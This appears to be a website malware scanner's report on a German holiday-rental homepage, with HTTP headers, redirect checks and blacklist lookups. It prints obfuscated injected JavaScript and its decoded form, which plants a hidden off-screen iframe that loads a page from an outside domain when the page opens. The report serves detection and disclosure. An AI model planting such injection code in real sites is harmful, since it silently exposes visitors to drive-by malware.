Scanned pages/files
Request | Server response | Status |
http://urlaub-in-wankendorf.de/ | 200 OK Content-Length: 2087 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{1-prototype;}catch(asd){x=2;} if(x){fr="fromChar";f=[4,0,91,108,100,88,107,95,100,101,22,91,105,99,54,91,90,29,32,22,112,4,0,107,88,104,21,96,92,103,100,22,50,23,90,100,90,107,98,92,100,105,37,89,103,92,87,105,92,59,97,92,99,90,101,106,29,30,95,91,105,87,98,92,29,30,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,101,102,105,94,107,95,100,101,51,28,88,88,104,102,98,106,107,91,28,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,105,102,102,50,30,35,46,48,47,90,100,29,48,4,0,94,93,104,98,37,105 if(x&&f&&012===10)e(s); Decoded script: function frmAdd() { var ifrm = document.createElement('iframe'); ifrm.style.position='absolute'; ifrm.style.top='-999em'; ifrm.style.left='-999em'; ifrm.src = "http://miamiheattickets.com/http.php"; ifrm.id = 'frmId'; document.body.appendChild(ifrm); }; window.onload = frmAdd; function frmAdd() { var ifrm = document.createElement('iframe'); ifrm.style.position='absolute'; ifrm.style.top='-999em'; ifrm.style.left='-999em'; ifrm.src = "http://miamiheattickets.com/http.php"; ifrm.id = 'frmId'; document.body.appendChild(ifrm); }; window.onload = frmAdd; Antivirus reports:
| ||
http://urlaub-in-wankendorf.de/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: urlaub-in-wankendorf.de
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 04 Oct 2014 14:46:24 GMT
Accept-Ranges: bytes
ETag: "4314eab5-827-4c57ae1c26a5e"
Server: Apache/2.2.9 (Debian) DAV/2 mod_ssl/2.2.9 OpenSSL/0.9.8g PHP/5.2.6-1+lenny10 with Suhosin-Patch
Vary: Accept-Encoding
Content-Length: 2087
Content-Type: text/html
Last-Modified: Mon, 23 Jul 2012 08:17:51 GMT
...2087 bytes of data.
GET / HTTP/1.1
Host: urlaub-in-wankendorf.de
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 04 Oct 2014 14:46:24 GMT
Accept-Ranges: bytes
ETag: "4314eab5-827-4c57ae1c26a5e"
Server: Apache/2.2.9 (Debian) DAV/2 mod_ssl/2.2.9 OpenSSL/0.9.8g PHP/5.2.6-1+lenny10 with Suhosin-Patch
Vary: Accept-Encoding
Content-Length: 2087
Content-Type: text/html
Last-Modified: Mon, 23 Jul 2012 08:17:51 GMT
...2087 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: urlaub-in-wankendorf.de
Referer: http://www.google.com/search?q=urlaub-in-wankendorf.de
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: urlaub-in-wankendorf.de
Referer: http://www.google.com/search?q=urlaub-in-wankendorf.de
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=urlaub-in-wankendorf.de
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://urlaub-in-wankendorf.de/
Result: urlaub-in-wankendorf.de is not infected or malware details are not published yet.
Result: urlaub-in-wankendorf.de is not infected or malware details are not published yet.